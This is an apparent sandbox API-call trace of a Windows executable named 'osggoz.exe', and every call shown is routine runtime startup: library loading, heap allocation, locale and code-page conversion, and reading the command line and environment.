# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Feb 5 2020 10:35:20 # Log Creation Date: 09.02.2020 09:00:33.617 Process: id = "1" image_name = "osggoz.exe" filename = "c:\\users\\fd1hvy\\desktop\\osggoz.exe" page_root = "0x76e4000" os_pid = "0x13c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7d0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\osggoz.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x13c8 [0045.928] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.929] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0045.929] GetProcAddress (hModule=0x747b0000, lpProcName=0x106a3e4) returned 0x748a7060 [0045.930] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0045.930] GetProcAddress (hModule=0x747b0000, lpProcName="FlsAlloc") returned 0x748abea0 [0045.930] GetProcAddress (hModule=0x747b0000, lpProcName="FlsSetValue") returned 0x748a2550 [0045.934] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0045.935] GetProcAddress (hModule=0x747b0000, lpProcName="InitializeCriticalSectionEx") returned 0x748a7060 [0045.936] GetProcessHeap () returned 0x20000 [0045.936] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0045.936] GetProcAddress (hModule=0x747b0000, lpProcName="FlsAlloc") returned 0x748abea0 [0045.936] GetLastError () returned 0xcb [0045.936] GetProcAddress (hModule=0x747b0000, lpProcName="FlsGetValue") returned 0x748970c0 [0045.936] GetProcAddress (hModule=0x747b0000, lpProcName="FlsSetValue") returned 0x748a2550 [0045.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x364) returned 0x3cb20 [0045.937] SetLastError (dwErrCode=0xcb) [0045.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xe00) returned 0x3dfd0 [0046.048] GetStartupInfoW (in: lpStartupInfo=0x118f96c | out: lpStartupInfo=0x118f96c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\osggoz.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x103de70, hStdOutput=0x827f47a8, hStdError=0xfffffffe)) [0046.048] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8c [0046.048] GetFileType (hFile=0x8c) returned 0x2 [0046.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0046.048] GetFileType (hFile=0x90) returned 0x2 [0046.048] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0046.048] GetFileType (hFile=0x94) returned 0x2 [0046.048] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\osggoz.exe\" " [0046.048] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\osggoz.exe\" " [0046.048] GetACP () returned 0x4e4 [0046.048] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x220) returned 0x3b718 [0046.048] IsValidCodePage (CodePage=0x4e4) returned 1 [0046.048] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x118f98c | out: lpCPInfo=0x118f98c) returned 1 [0046.048] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x118f254 | out: lpCPInfo=0x118f254) returned 1 [0046.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0046.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x118eff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虂ąĀ") returned 256 [0046.048] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ虂ąĀ", cchSrc=256, lpCharType=0x118f268 | out: lpCharType=0x118f268) returned 1 [0046.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0046.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x118efa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0046.048] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0046.049] GetProcAddress (hModule=0x747b0000, lpProcName="LCMapStringEx") returned 0x7488ed00 [0046.049] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0046.049] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x118ed98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0046.049] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x118f768, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼°o\x82¤ù\x18\x01Mª\x05\x01\x18·\x03", lpUsedDefaultChar=0x0) returned 256 [0046.049] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0046.049] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x118f868, cbMultiByte=256, lpWideCharStr=0x118efc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ粌ąĀ") returned 256 [0046.049] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ粌ąĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0046.049] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ粌ąĀ", cchSrc=256, lpDestStr=0x118edb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0046.049] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x118f668, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼°o\x82¤ù\x18\x01Mª\x05\x01\x18·\x03", lpUsedDefaultChar=0x0) returned 256 [0046.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x26618 [0046.049] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x118f7b0, nSize=0x105 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\osggoz.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\osggoz.exe")) returned 0x22 [0046.049] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76750000 [0046.049] GetProcAddress (hModule=0x76750000, lpProcName="AreFileApisANSI") returned 0x76764280 [0046.049] AreFileApisANSI () returned 1 [0046.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\osggoz.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0046.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\osggoz.exe", cchWideChar=-1, lpMultiByteStr=0x1086808, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop\\osggoz.exe", lpUsedDefaultChar=0x0) returned 35 [0046.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x2b) returned 0x2f5b0 [0046.050] RtlInitializeSListHead (in: ListHead=0x1086128 | out: ListHead=0x1086128) [0046.050] GetLastError () returned 0x0 [0046.050] SetLastError (dwErrCode=0x0) [0046.050] GetEnvironmentStringsW () returned 0x3edd8* [0046.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x565) returned 0x3f8b0 [0046.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3f8b0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0046.050] FreeEnvironmentStringsW (penv=0x3edd8) returned 1 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x94) returned 0x2f918 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1f) returned 0x2adb0 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x28) returned 0x35cb8 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x37) returned 0x38b68 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x3c) returned 0x320d8 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x31) returned 0x38968 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x14) returned 0x35350 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x24) returned 0x35b38 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xd) returned 0x3c760 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x17) returned 0x35510 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x2b) returned 0x3f3f0 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x15) returned 0x353f0 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x17) returned 0x35390 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x22) returned 0x35a78 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xe) returned 0x3c8e0 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xc1) returned 0x31f48 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x3e) returned 0x324c8 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1b) returned 0x2add8 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1d) returned 0x2af68 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x48) returned 0x2e148 [0046.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x12) returned 0x35630 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x18) returned 0x355d0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1b) returned 0x2ae00 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x24) returned 0x35d18 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x29) returned 0x3ee40 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1e) returned 0x403c8 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x6b) returned 0x315e0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x17) returned 0x35610 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xf) returned 0x3c7f0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x16) returned 0x352f0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x28) returned 0x35b98 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x27) returned 0x35ad8 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x12) returned 0x353b0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x21) returned 0x359e8 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x10) returned 0x3c778 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1c) returned 0x404e0 [0046.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x12) returned 0x35410 [0046.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x3f8b0 | out: hHeap=0x20000) returned 1 [0046.051] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76750000 [0046.051] GetProcAddress (hModule=0x76750000, lpProcName="FlsAlloc") returned 0x76764ae0 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="FlsFree") returned 0x76764b00 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="FlsGetValue") returned 0x76764b20 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="FlsSetValue") returned 0x76764b40 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="InitializeCriticalSectionEx") returned 0x767bebc0 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="InitOnceExecuteOnce") returned 0x748a5550 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="CreateEventExW") returned 0x767beb20 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="CreateSemaphoreW") returned 0x767beb90 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="CreateSemaphoreExW") returned 0x767beb80 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="CreateThreadpoolTimer") returned 0x76766d30 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="SetThreadpoolTimer") returned 0x7789d7c0 [0046.052] GetProcAddress (hModule=0x76750000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7789b840 